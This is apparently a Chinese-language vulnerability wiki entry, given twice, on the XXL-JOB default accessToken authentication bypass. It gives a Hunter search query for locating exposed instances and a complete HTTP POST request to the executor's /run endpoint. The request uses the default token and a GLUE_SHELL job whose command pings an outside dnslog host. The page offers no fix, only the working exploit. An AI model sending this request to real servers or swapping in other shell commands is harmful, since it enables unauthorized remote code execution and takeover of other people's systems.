fofamini-wiki

登录白背景

源码

XXL-JOB默认accessToken权限绕过漏洞

一、漏洞简介

XXL-JOB 默认配置下，用于调度通讯的 accessToken 不是随机生成的，而是使用 application.properties 配置文件中的默认值。在实际使用中如果没有修改默认值，攻击者可利用此绕过认证调用 executor，执行任意代码，从而获取服务器权限。

二、影响版本

XXL-JOB

三、资产测绘

hunterapp.name="XXL-JOB"
特征

四、漏洞复现

POST /run HTTP/1.1
Content-Type: application/json
XXL-JOB-ACCESS-TOKEN: default_token
User-Agent: Java/1.8.0_391
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 323
Connection: close

{"jobId": 287040,"executorHandler": "demoJobHandler","executorParams": "demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0,"logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "ping 0n3fio.dnslog.cn","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}

原文: https://www.yuque.com/xiaokp7/ocvun2/ixd973mksvmz9c3w

# XXL-JOB默认accessToken权限绕过漏洞

# 一、漏洞简介
 XXL-JOB 默认配置下，用于调度通讯的 accessToken 不是随机生成的，而是使用 application.properties 配置文件中的默认值。在实际使用中如果没有修改默认值，攻击者可利用此绕过认证调用 executor，执行任意代码，从而获取服务器权限。

# 二、影响版本

- XXL-JOB

# 三、资产测绘

- hunter`app.name="XXL-JOB"`
- 特征![image.png](./img/sKn1oToMtxlW5Er2/1699413014637-abd39b12-24f1-4f3e-a8be-1b5a12515d2c-262622.png)

# 四、漏洞复现
```
POST /run HTTP/1.1
Content-Type: application/json
XXL-JOB-ACCESS-TOKEN: default_token
User-Agent: Java/1.8.0_391
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 323
Connection: close

{"jobId": 287040,"executorHandler": "demoJobHandler","executorParams": "demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0,"logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "ping 0n3fio.dnslog.cn","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}
```
![image.png](./img/sKn1oToMtxlW5Er2/1699413047757-a647af66-cd6a-4bb0-a48f-876fe2f1c266-864623.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ixd973mksvmz9c3w>